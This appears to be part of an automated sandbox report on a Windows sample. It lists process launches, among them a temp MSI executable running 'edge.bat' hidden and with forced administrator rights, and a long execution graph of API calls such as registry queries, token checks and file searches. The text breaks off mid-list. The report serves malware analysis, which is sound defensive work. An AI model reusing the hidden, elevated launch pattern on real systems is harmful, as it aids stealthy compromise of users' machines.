                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:50
                                                                                                                                                                            Start time:14:12:34
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:51
                                                                                                                                                                            Start time:14:12:36
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 2
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:52
                                                                                                                                                                            Start time:14:12:38
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:timeout 5
                                                                                                                                                                            Imagebase:0x7ff798f70000
                                                                                                                                                                            File size:32'768 bytes
                                                                                                                                                                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:true

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:54
                                                                                                                                                                            Start time:14:12:43
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\Installer\MSIFB77.tmp
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\Installer\MSIFB77.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\edge.bat"
                                                                                                                                                                            Imagebase:0x7ff7a4750000
                                                                                                                                                                            File size:570'176 bytes
                                                                                                                                                                            MD5 hash:514314174B6F6A3AB2195C456B83AA1E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:55
                                                                                                                                                                            Start time:14:12:43
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" "
                                                                                                                                                                            Imagebase:0x7ff65c650000
                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            General

                                                                                                                                                                            Target ID:56
                                                                                                                                                                            Start time:14:12:43
                                                                                                                                                                            Start date:28/10/2024
                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Has exited:false

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Reset < >

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:1.8%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:29.5%
                                                                                                                                                                              Total number of Nodes:1195
                                                                                                                                                                              Total number of Limit Nodes:45
                                                                                                                                                                              execution_graph 44741 d981b8 44742 d981f6 44741->44742 44746 d981c6 __Getctype 44741->44746 44749 d852ff 13 API calls __dosmaperr 44742->44749 44743 d981e1 RtlAllocateHeap 44745 d981f4 44743->44745 44743->44746 44746->44742 44746->44743 44748 d95443 EnterCriticalSection std::_Facet_Register 44746->44748 44748->44746 44749->44745 44750 d23330 44752 d23365 44750->44752 44751 d23397 44782 d7fd94 44751->44782 44752->44751 44756 d2341c 44752->44756 44758 d23457 44756->44758 44759 d234c8 44756->44759 44757 d233df 44762 d233f1 44757->44762 44795 d16f50 GetWindowLongW GetParent GetWindow 44757->44795 44760 d7fd94 std::_Facet_Register 2 API calls 44758->44760 44763 d2354f 44759->44763 44764 d234fc 44759->44764 44761 d2345e 44760->44761 44767 d235da 44763->44767 44769 d23587 44763->44769 44766 d7fd94 std::_Facet_Register 2 API calls 44764->44766 44768 d23503 44766->44768 44773 d23617 44767->44773 44774 d23673 44767->44774 44771 d7fd94 std::_Facet_Register 2 API calls 44769->44771 44770 d23700 44772 d7fd94 std::_Facet_Register 2 API calls 44770->44772 44775 d2358e 44771->44775 44776 d23707 44772->44776 44777 d7fd94 std::_Facet_Register 2 API calls 44773->44777 44774->44770 44779 d236a4 44774->44779 44778 d2361e 44777->44778 44780 d7fd94 std::_Facet_Register 2 API calls 44779->44780 44781 d236ab 44780->44781 44784 d7fd99 std::_Facet_Register 44782->44784 44783 d2339e 44789 c7eab0 44783->44789 44784->44783 44786 d7fdb5 std::_Facet_Register 44784->44786 44796 d95443 EnterCriticalSection std::_Facet_Register 44784->44796 44797 d81aea 44786->44797 44788 d80c00 44790 c7eae4 44789->44790 44794 c7eb01 std::ios_base::_Ios_base_dtor 44789->44794 44791 d7fd94 std::_Facet_Register 2 API calls 44790->44791 44792 c7eaeb 44791->44792 44800 d16e40 44792->44800 44794->44757 44795->44762 44796->44784 44798 d81b31 RaiseException 44797->44798 44799 d81b04 44797->44799 44798->44788 44799->44798 44805 cd0dc0 44800->44805 44802 d16ec4 44802->44794 44804 d16ea9 CoCreateInstance 44804->44802 44812 cd1040 44805->44812 44809 cd0ea5 44809->44802 44809->44804 44810 cd0e10 __set_se_translator 44810->44809 44824 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 44810->44824 44813 cd1077 44812->44813 44819 cd0de9 44812->44819 44814 d80260 4 API calls 44813->44814 44815 cd1081 44814->44815 44815->44819 44825 cd10e0 44815->44825 44819->44809 44820 d80260 EnterCriticalSection 44819->44820 44821 d80274 44820->44821 44822 d80279 44821->44822 44870 d802e8 SleepConditionVariableCS WaitForSingleObjectEx EnterCriticalSection 44821->44870 44822->44810 44824->44809 44826 cd1136 RegOpenKeyExW 44825->44826 44827 cd115c RegQueryValueExW RegQueryValueExW 44826->44827 44828 cd141b 44826->44828 44829 cd11bf RegQueryValueExW 44827->44829 44830 cd121b RegQueryValueExW 44827->44830 44831 cd1447 44828->44831 44832 cd1436 RegCloseKey 44828->44832 44829->44830 44833 cd11f3 44829->44833 44835 cd125e 44830->44835 44862 d7fd55 44831->44862 44832->44831 44833->44830 44833->44833 44837 cd12ab RegQueryValueExW 44835->44837 44836 cd10aa 44850 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 44836->44850 44838 cd12fd RegQueryValueExW 44837->44838 44839 cd12d8 44837->44839 44840 cd132a 44838->44840 44839->44838 44841 cd13db 44840->44841 44842 d80260 4 API calls 44840->44842 44843 cd13ff 44841->44843 44844 cd13e5 GetCurrentProcess 44841->44844 44845 cd139e 44842->44845 44851 cd1470 44843->44851 44844->44843 44845->44841 44847 cd13aa GetModuleHandleW GetProcAddress 44845->44847 44861 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 44847->44861 44849 cd13d8 44849->44841 44850->44819 44852 cd14c8 RegOpenKeyExW 44851->44852 44853 cd14ee RegQueryValueExW 44852->44853 44860 cd15a0 44852->44860 44856 cd156f RegQueryValueExW 44853->44856 44859 cd1521 44853->44859 44854 cd176d RegCloseKey 44855 cd177e 44854->44855 44857 d7fd55 _ValidateLocalCookies 5 API calls 44855->44857 44856->44860 44858 cd1796 44857->44858 44858->44828 44859->44856 44860->44854 44860->44855 44861->44849 44863 d7fd5e IsProcessorFeaturePresent 44862->44863 44864 d7fd5d 44862->44864 44866 d80461 44863->44866 44864->44836 44869 d80424 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 44866->44869 44868 d80544 44868->44836 44869->44868 44870->44821 44871 c68b80 IsWindow 44872 c68bd4 DestroyWindow 44871->44872 44873 c68bdd 44871->44873 44872->44873 44890 ba8960 40 API calls 2 library calls 44873->44890 44875 c68bf3 44891 bdb1f0 41 API calls 2 library calls 44875->44891 44877 c68c0c 44892 ba8960 40 API calls 2 library calls 44877->44892 44879 c68c18 44893 ba8960 40 API calls 2 library calls 44879->44893 44881 c68c24 44894 ba8960 40 API calls 2 library calls 44881->44894 44883 c68c30 44895 ba8960 40 API calls 2 library calls 44883->44895 44885 c68c3b 44896 c177a0 52 API calls 44885->44896 44887 c68c47 44888 c68c73 44887->44888 44897 d7f9ae 10 API calls 44887->44897 44890->44875 44891->44877 44892->44879 44893->44881 44894->44883 44895->44885 44896->44887 44897->44888 44898 cbffe0 44899 cc0018 44898->44899 44900 cc002b 44898->44900 44903 d7fd55 _ValidateLocalCookies 5 API calls 44899->44903 44906 caf7e0 53 API calls 4 library calls 44900->44906 44902 cc0035 44907 ba8960 40 API calls 2 library calls 44902->44907 44905 cc007a 44903->44905 44906->44902 44907->44899 44908 ccbd60 44911 ccbda0 44908->44911 44915 ccbde4 44911->44915 44922 ccbddc 44911->44922 44912 d7fd55 _ValidateLocalCookies 5 API calls 44914 ccbd88 44912->44914 44913 ccbed1 44924 baa9b0 44913->44924 44915->44913 44918 ccbe14 __set_se_translator 44915->44918 44915->44922 44917 ccbedb 44919 ccbe32 FindFirstFileW 44918->44919 44918->44922 44920 ccbe7e GetLastError 44919->44920 44921 ccbe61 44919->44921 44920->44921 44921->44922 44923 ccbe9b FindClose 44921->44923 44922->44912 44923->44922 44925 baa9bd 44924->44925 44926 d81aea Concurrency::cancel_current_task RaiseException 44925->44926 44927 baa9ca RtlAllocateHeap 44926->44927 44927->44917 44928 ccad60 44972 cc9320 41 API calls 44928->44972 44930 ccad9f 44973 bd2880 41 API calls 44930->44973 44932 ccadb7 44974 ba9dd0 41 API calls 44932->44974 44934 ccadcd 44975 ba8960 40 API calls 2 library calls 44934->44975 44936 ccaddf 44937 ccae19 std::ios_base::_Ios_base_dtor __set_se_translator 44936->44937 44940 ccb048 44936->44940 44938 ccaea2 44937->44938 45008 bb9ad0 51 API calls 44937->45008 44939 ccaec9 44938->44939 44942 ccaeaf 44938->44942 44976 cd3dc0 44939->44976 45016 d851ef 44940->45016 45010 cd5630 93 API calls 5 library calls 44942->45010 44944 ccaeda 45011 ba8300 41 API calls 2 library calls 44944->45011 44946 ccb04d 44950 d851ef std::_Throw_Cpp_error 40 API calls 44946->44950 44948 ccae73 45009 ba81d0 41 API calls std::locale::_Locimp::_Locimp 44948->45009 44952 ccb052 44950->44952 44951 ccaec6 44951->44939 45021 ba8300 41 API calls 2 library calls 44952->45021 44953 ccaf11 45012 cc9320 41 API calls 44953->45012 44956 ccb0b9 45022 d819c5 44956->45022 44957 ccaf25 45013 cd1c40 59 API calls 5 library calls 44957->45013 44961 ccb0cc 45035 cd5630 93 API calls 5 library calls 44961->45035 44963 ccafdf std::ios_base::_Ios_base_dtor 45014 ba8960 40 API calls 2 library calls 44963->45014 44964 ccb0db 44965 ccaf45 std::ios_base::_Ios_base_dtor 44965->44946 44965->44963 44967 ccb015 45015 ba8960 40 API calls 2 library calls 44967->45015 44969 ccb027 44970 d7fd55 _ValidateLocalCookies 5 API calls 44969->44970 44971 ccb042 44970->44971 44972->44930 44973->44932 44974->44934 44975->44936 45036 ba8850 44976->45036 44978 cd3e69 __set_se_translator 44979 cd3e9a LoadStringW 44978->44979 44980 cd3ecd 44979->44980 44981 cd3f80 __set_se_translator 44979->44981 45051 ba8300 41 API calls 2 library calls 44980->45051 44983 cd3fd5 LoadStringW 44981->44983 45053 cd41c0 42 API calls 2 library calls 44981->45053 44983->44981 44984 cd3fec 44983->44984 45054 ba8300 41 API calls 2 library calls 44984->45054 44985 cd3eee 44997 cd3f00 std::ios_base::_Ios_base_dtor 44985->44997 45052 ba8960 40 API calls 2 library calls 44985->45052 44989 cd400d 44989->44997 45055 ba8960 40 API calls 2 library calls 44989->45055 44990 cd4108 44994 d851ef std::_Throw_Cpp_error 40 API calls 44990->44994 44992 cd40c9 std::ios_base::_Ios_base_dtor 44993 d7fd55 _ValidateLocalCookies 5 API calls 44992->44993 44995 cd4101 44993->44995 44996 cd410d 44994->44996 44995->44944 44998 cd41ae 44996->44998 45000 cd4149 44996->45000 45001 cd4191 SysAllocStringLen 44996->45001 44997->44990 44997->44992 44999 baa9b0 2 API calls 44998->44999 45004 cd41b8 44999->45004 45002 cd414e CLSIDFromString SysFreeString 45000->45002 45001->45002 45003 cd41a4 45001->45003 45006 d7fd55 _ValidateLocalCookies 5 API calls 45002->45006 45005 baa9b0 2 API calls 45003->45005 45005->44998 45007 cd418d 45006->45007 45007->44944 45008->44948 45009->44938 45010->44951 45011->44953 45012->44957 45013->44965 45014->44967 45015->44969 45057 d8512b 40 API calls __cftof 45016->45057 45018 d851fe 45058 d8520c 11 API calls __set_se_translator 45018->45058 45020 d8520b 45021->44956 45059 d819d3 45022->45059 45024 d819ca 45024->44961 45073 d9947f EnterCriticalSection __set_se_translator 45024->45073 45026 d89880 45032 d8988b 45026->45032 45074 d994c4 40 API calls 6 library calls 45026->45074 45028 d89895 IsProcessorFeaturePresent 45030 d898a1 45028->45030 45029 d898b4 45076 d8b61b 22 API calls __set_se_translator 45029->45076 45075 d84fe3 8 API calls 2 library calls 45030->45075 45032->45028 45032->45029 45034 d898be 45035->44964 45037 ba889b 45036->45037 45038 ba885b 45036->45038 45056 ba8830 41 API calls 3 library calls 45037->45056 45039 ba8864 45038->45039 45042 ba8886 45038->45042 45039->45037 45041 ba886b 45039->45041 45045 d7fd94 std::_Facet_Register 2 API calls 45041->45045 45043 ba8896 45042->45043 45046 d7fd94 std::_Facet_Register 2 API calls 45042->45046 45043->44978 45044 ba8871 45047 d851ef std::_Throw_Cpp_error 40 API calls 45044->45047 45050 ba887a 45044->45050 45045->45044 45048 ba8890 45046->45048 45049 ba88a5 45047->45049 45048->44978 45050->44978 45051->44985 45052->44997 45053->44981 45054->44989 45055->44997 45056->45044 45057->45018 45058->45020 45060 d819dc 45059->45060 45061 d819df GetLastError 45059->45061 45060->45024 45077 d84bbd 6 API calls ___vcrt_InitializeCriticalSectionEx 45061->45077 45063 d819f4 45064 d81a13 45063->45064 45065 d81a59 SetLastError 45063->45065 45078 d84bf8 6 API calls ___vcrt_InitializeCriticalSectionEx 45063->45078 45064->45065 45065->45024 45067 d81a0d __Getctype 45067->45064 45068 d81a35 45067->45068 45079 d84bf8 6 API calls ___vcrt_InitializeCriticalSectionEx 45067->45079 45071 d81a49 45068->45071 45080 d84bf8 6 API calls ___vcrt_InitializeCriticalSectionEx 45068->45080 45081 d89c89 45071->45081 45073->45026 45074->45032 45075->45029 45076->45034 45077->45063 45078->45067 45079->45068 45080->45071 45084 d9817e 45081->45084 45085 d98189 RtlFreeHeap 45084->45085 45086 d89ca1 45084->45086 45085->45086 45087 d9819e GetLastError 45085->45087 45086->45064 45088 d981ab __dosmaperr 45087->45088 45090 d852ff 13 API calls __dosmaperr 45088->45090 45090->45086 45091 bdcbb0 45092 bdcbfa 45091->45092 45093 bdd733 45091->45093 45092->45093 45095 bdcc03 45092->45095 45094 baa9b0 2 API calls 45093->45094 45096 bdd73d 45094->45096 45097 bdcc8d 45095->45097 45283 baacf0 45095->45283 45098 d851ef std::_Throw_Cpp_error 40 API calls 45096->45098 45257 d7db49 44 API calls 6 library calls 45097->45257 45101 bdd742 45098->45101 45429 d7d8f7 41 API calls 2 library calls 45101->45429 45103 bdccd2 45258 bdf130 44 API calls 6 library calls 45103->45258 45105 bdd76d 45109 baa9b0 2 API calls 45105->45109 45107 bdd749 45430 d7d8f7 41 API calls 2 library calls 45107->45430 45108 bdcce5 45259 bdf330 44 API calls 4 library calls 45108->45259 45110 bdd777 45109->45110 45113 baa9b0 2 API calls 45110->45113 45118 bdd781 45113->45118 45114 bdd750 45431 d7d8f7 41 API calls 2 library calls 45114->45431 45116 bdccf1 45260 bdef70 41 API calls std::_Facet_Register 45116->45260 45122 baa9b0 2 API calls 45118->45122 45120 bdcc7c 45381 d00070 45120->45381 45121 bdcd10 45261 bdf7c0 41 API calls 2 library calls 45121->45261 45124 bdd78b __set_se_translator 45122->45124 45123 bdd757 45432 d899d2 46 API calls 2 library calls 45123->45432 45434 cbd230 52 API calls 2 library calls 45124->45434 45127 bdcc54 45127->45120 45129 bc2290 120 API calls 45127->45129 45128 bdd75c 45433 d7d8f7 41 API calls 2 library calls 45128->45433 45129->45120 45133 bdd858 45435 ba8300 41 API calls 2 library calls 45133->45435 45135 bdcd47 45262 ccbee0 105 API calls 45135->45262 45138 bdd899 45140 d7fd94 std::_Facet_Register 2 API calls 45138->45140 45139 bdcdfa 45263 ba8300 41 API calls 2 library calls 45139->45263 45141 bdd8e9 45140->45141 45436 d89b6a 45 API calls 2 library calls 45141->45436 45144 bdce39 45264 cbd440 51 API calls _ValidateLocalCookies 45144->45264 45145 bdd91e 45147 bdd92f 45145->45147 45148 bdda63 45145->45148 45150 bdd95e GetCurrentThreadId 45147->45150 45151 bdda74 45147->45151 45441 d7d8f7 41 API calls 2 library calls 45148->45441 45149 bdce49 45265 ba8960 40 API calls 2 library calls 45149->45265 45154 bdda7b 45150->45154 45155 bdd971 45150->45155 45442 d7d8f7 41 API calls 2 library calls 45151->45442 45443 d7d8f7 41 API calls 2 library calls 45154->45443 45437 d7d95b WaitForSingleObjectEx GetExitCodeThread CloseHandle 45155->45437 45157 bdce55 45266 ba8300 41 API calls 2 library calls 45157->45266 45161 bdd97f 45162 bdda82 45161->45162 45163 bdd98a 45161->45163 45444 d7d8f7 41 API calls 2 library calls 45162->45444 45165 bdda89 45163->45165 45166 bdd9ab 45163->45166 45445 d899d2 46 API calls 2 library calls 45165->45445 45168 bdd9ed std::ios_base::_Ios_base_dtor 45166->45168 45171 bdda8e 45166->45171 45438 ba8960 40 API calls 2 library calls 45168->45438 45174 d851ef std::_Throw_Cpp_error 40 API calls 45171->45174 45172 bdcf8e lstrcmpiW 45175 bdce8f 45172->45175 45173 bdda1a 45439 ba8960 40 API calls 2 library calls 45173->45439 45178 bdda93 45174->45178 45179 bdd18b 45175->45179 45412 ba8300 41 API calls 2 library calls 45175->45412 45176 bdce79 45176->45172 45176->45175 45446 ba8960 40 API calls 2 library calls 45178->45446 45197 bdd1c2 std::ios_base::_Ios_base_dtor 45179->45197 45415 ba8960 40 API calls 2 library calls 45179->45415 45180 bdda29 45440 ba8960 40 API calls 2 library calls 45180->45440 45184 bddad5 45185 bdd16a 45414 cbc540 lstrcmpiW 45185->45414 45186 bdd11e lstrcmpiW 45190 bdcff5 45186->45190 45187 bdcfd8 45187->45186 45187->45190 45189 bdda48 45192 d7fd55 _ValidateLocalCookies 5 API calls 45189->45192 45190->45179 45413 ba8300 41 API calls 2 library calls 45190->45413 45196 bdda5f 45192->45196 45193 bdd274 std::ios_base::_Ios_base_dtor 45194 bdd29f 45193->45194 45195 bdd391 45193->45195 45199 d7fd94 std::_Facet_Register 2 API calls 45194->45199 45267 cc72e0 45195->45267 45197->45096 45197->45193 45201 bdd2ad 45199->45201 45416 d89b6a 45 API calls 2 library calls 45201->45416 45202 bdd45f 45205 baacf0 52 API calls 45202->45205 45203 bdd39e 45418 ba8300 41 API calls 2 library calls 45203->45418 45207 bdd464 45205->45207 45206 bdd2ec 45206->45101 45206->45128 45210 bdd321 GetCurrentThreadId 45206->45210 45207->45105 45208 bdd46e 45207->45208 45214 bdd49f 45208->45214 45215 bdd494 45208->45215 45210->45107 45212 bdd334 45210->45212 45211 bdd3d9 45419 ba8300 41 API calls 2 library calls 45211->45419 45417 d7d95b WaitForSingleObjectEx GetExitCodeThread CloseHandle 45212->45417 45423 baa830 42 API calls 4 library calls 45214->45423 45422 baa2a0 49 API calls 45215->45422 45216 bdd342 45216->45114 45217 bdd34d 45216->45217 45217->45123 45224 bdd378 45217->45224 45221 bdd49d 45424 ccd460 114 API calls 45221->45424 45222 bdd41e 45420 ba8960 40 API calls 2 library calls 45222->45420 45225 bdd457 45224->45225 45227 bdd5c0 45225->45227 45228 bdd659 45225->45228 45232 baacf0 52 API calls 45225->45232 45227->45228 45230 baacf0 52 API calls 45227->45230 45427 bde9e0 56 API calls 45228->45427 45229 bdd44b 45421 ba8960 40 API calls 2 library calls 45229->45421 45235 bdd610 45230->45235 45236 bdd536 45232->45236 45234 bdd688 45239 bdd6bc Sleep 45234->45239 45246 bdd6c7 45234->45246 45235->45118 45237 bdd61a 45235->45237 45236->45110 45238 bdd540 45236->45238 45240 bc2290 120 API calls 45237->45240 45241 bc2290 120 API calls 45238->45241 45239->45246 45242 bdd640 45240->45242 45243 bdd566 45241->45243 45426 ccb1b0 130 API calls 45242->45426 45425 ccef90 73 API calls 45243->45425 45428 ba8960 40 API calls 2 library calls 45246->45428 45247 bdd64e 45249 d00070 208 API calls 45247->45249 45248 bdd5ac 45251 d00070 208 API calls 45248->45251 45249->45228 45251->45227 45252 bdd710 45254 d7fd55 _ValidateLocalCookies 5 API calls 45252->45254 45253 bdd57b 45253->45248 45255 bc2290 120 API calls 45253->45255 45256 bdd72d 45254->45256 45255->45248 45257->45103 45258->45108 45259->45116 45260->45121 45261->45135 45262->45139 45263->45144 45264->45149 45265->45157 45266->45176 45268 cc7328 GetCurrentProcess OpenProcessToken 45267->45268 45269 cc734c GetTokenInformation 45268->45269 45270 cc733f GetLastError 45268->45270 45272 cc736f GetLastError 45269->45272 45273 cc739b 45269->45273 45271 cc73f4 45270->45271 45276 cc742d 45271->45276 45277 cc741f CloseHandle 45271->45277 45274 cc73ee GetLastError 45272->45274 45278 cc737a 45272->45278 45273->45274 45275 cc73a1 AllocateAndInitializeSid 45273->45275 45274->45271 45275->45271 45279 cc73d2 EqualSid FreeSid 45275->45279 45280 d7fd55 _ValidateLocalCookies 5 API calls 45276->45280 45277->45276 45282 cc7385 GetTokenInformation 45278->45282 45279->45271 45281 bdd396 45280->45281 45281->45202 45281->45203 45282->45273 45282->45274 45284 baad28 45283->45284 45296 baad7c 45283->45296 45285 d80260 4 API calls 45284->45285 45287 baad32 45285->45287 45286 d80260 4 API calls 45288 baad96 45286->45288 45289 baad3e GetProcessHeap 45287->45289 45287->45296 45297 baae07 45288->45297 45449 d80118 43 API calls 45288->45449 45447 d80118 43 API calls 45289->45447 45292 baad6b 45448 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45292->45448 45293 baadf6 45450 d80216 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 45293->45450 45296->45286 45296->45297 45297->45105 45298 bc2290 45297->45298 45307 bc2321 std::locale::_Locimp::_Locimp 45298->45307 45308 bc22b6 ___crtCompareStringW __set_se_translator 45298->45308 45299 baa9b0 2 API calls 45300 bc236c 45299->45300 45301 bc23db 45300->45301 45302 bc23ce FindClose 45300->45302 45453 baa600 RtlAllocateHeap RaiseException 45301->45453 45302->45301 45304 bc234f 45304->45127 45306 bc23f7 45310 baacf0 52 API calls 45306->45310 45307->45299 45307->45304 45308->45307 45451 d852ff 13 API calls __dosmaperr 45308->45451 45309 bc233d 45452 d851df 40 API calls __cftof 45309->45452 45315 bc2409 45310->45315 45312 bc27bc 45313 baa9b0 2 API calls 45312->45313 45314 bc27c6 45313->45314 45465 baa4e0 45314->45465 45315->45312 45317 bc2431 45315->45317 45318 bc243f 45315->45318 45454 baa2a0 49 API calls 45317->45454 45318->45318 45455 baa830 42 API calls 4 library calls 45318->45455 45320 bc280f 45323 bc2a0c 45320->45323 45324 bc2a30 45320->45324 45335 bc2845 45320->45335 45322 bc243d 45326 bc25d5 FindFirstFileW 45322->45326 45327 bc2486 PathIsUNCW 45322->45327 45329 bc26ac 45322->45329 45323->45127 45325 baa9b0 2 API calls 45324->45325 45330 bc2a3a 45325->45330 45326->45329 45333 bc25ed GetFullPathNameW 45326->45333 45331 bc249b 45327->45331 45332 bc2565 45327->45332 45328 bc2862 45485 bc2be0 54 API calls 45328->45485 45329->45127 45456 bb5b60 54 API calls 4 library calls 45331->45456 45459 bb5b60 54 API calls 4 library calls 45332->45459 45334 bc2606 45333->45334 45379 bc2741 ___crtCompareStringW 45333->45379 45339 bc2621 GetFullPathNameW 45334->45339 45335->45328 45484 bc2c90 RtlAllocateHeap RaiseException 45335->45484 45344 bc263a ___crtCompareStringW 45339->45344 45341 bc286d 45343 bc2290 112 API calls 45341->45343 45342 baa9b0 2 API calls 45342->45312 45345 bc2881 45343->45345 45349 bc26e6 45344->45349 45360 bc266e 45344->45360 45344->45379 45345->45323 45350 bc28b4 PathIsUNCW 45345->45350 45346 bc24a3 45346->45326 45457 bb5f50 105 API calls 7 library calls 45346->45457 45347 bc256d 45347->45326 45365 bc2531 45347->45365 45362 bc26f8 _wcsrchr 45349->45362 45461 baa6b0 42 API calls 4 library calls 45349->45461 45351 bc28c8 45350->45351 45352 bc2997 45350->45352 45486 bb5b60 54 API calls 4 library calls 45351->45486 45489 bb5b60 54 API calls 4 library calls 45352->45489 45357 bc251e 45458 bc2b70 42 API calls 45357->45458 45359 bc26a4 SetLastError 45359->45329 45360->45359 45364 bc2697 FindClose 45360->45364 45363 bc2718 _wcsrchr 45362->45363 45462 baa6b0 42 API calls 4 library calls 45362->45462 45367 bc272b 45363->45367 45368 bc2745 45363->45368 45364->45359 45460 bc2a40 42 API calls 3 library calls 45365->45460 45371 bc2793 45367->45371 45367->45379 45463 baa6b0 42 API calls 4 library calls 45367->45463 45368->45379 45464 baa6b0 42 API calls 4 library calls 45368->45464 45369 bc28d0 45369->45323 45372 bc2934 45369->45372 45370 bc299f 45370->45323 45490 bc2a40 42 API calls 3 library calls 45370->45490 45371->45329 45487 bb5f50 105 API calls 7 library calls 45372->45487 45377 bc2951 45488 bc2b70 42 API calls 45377->45488 45379->45342 45379->45371 45380 bc2963 45380->45370 45382 d000b6 EnterCriticalSection 45381->45382 45383 d000ab InitializeCriticalSection 45381->45383 45496 d00370 45382->45496 45383->45382 45385 d000cd 45582 d00290 72 API calls _ValidateLocalCookies 45385->45582 45387 d000d5 WriteFile FlushFileBuffers 45388 d00113 45387->45388 45389 baacf0 52 API calls 45388->45389 45390 d00120 45389->45390 45391 d00279 45390->45391 45394 d00153 45390->45394 45395 d00148 45390->45395 45392 baa9b0 2 API calls 45391->45392 45393 d00283 45392->45393 45584 baa830 42 API calls 4 library calls 45394->45584 45583 baa2a0 49 API calls 45395->45583 45398 d00151 45399 d0015f WriteFile FlushFileBuffers 45398->45399 45400 d001a0 WriteFile FlushFileBuffers 45399->45400 45401 d00198 45399->45401 45402 baacf0 52 API calls 45400->45402 45401->45400 45403 d001c9 45402->45403 45403->45391 45404 d001d1 45403->45404 45405 d001f1 45404->45405 45406 d001fc 45404->45406 45585 baa2a0 49 API calls 45405->45585 45586 baa830 42 API calls 4 library calls 45406->45586 45409 d00208 WriteFile FlushFileBuffers 45411 d0023f 45409->45411 45410 d001fa 45410->45409 45411->45097 45412->45187 45413->45185 45414->45179 45415->45197 45416->45206 45417->45216 45418->45211 45419->45222 45420->45229 45421->45225 45422->45221 45423->45221 45424->45224 45425->45253 45426->45247 45427->45234 45428->45252 45432->45128 45434->45133 45435->45138 45436->45145 45437->45161 45438->45173 45439->45180 45440->45189 45445->45171 45446->45184 45447->45292 45448->45296 45449->45293 45450->45297 45451->45309 45452->45307 45453->45306 45454->45322 45455->45322 45456->45346 45457->45357 45458->45365 45459->45347 45460->45326 45461->45362 45462->45363 45463->45379 45464->45379 45466 baa4eb 45465->45466 45467 baa4fa 45466->45467 45468 baa59a 45466->45468 45469 baa517 __set_se_translator 45466->45469 45467->45320 45495 baa770 42 API calls 45468->45495 45470 baa55d std::locale::_Locimp::_Locimp 45469->45470 45472 baa53e 45469->45472 45479 baa57f 45469->45479 45470->45320 45491 d852ff 13 API calls __dosmaperr 45472->45491 45473 baa59f 45475 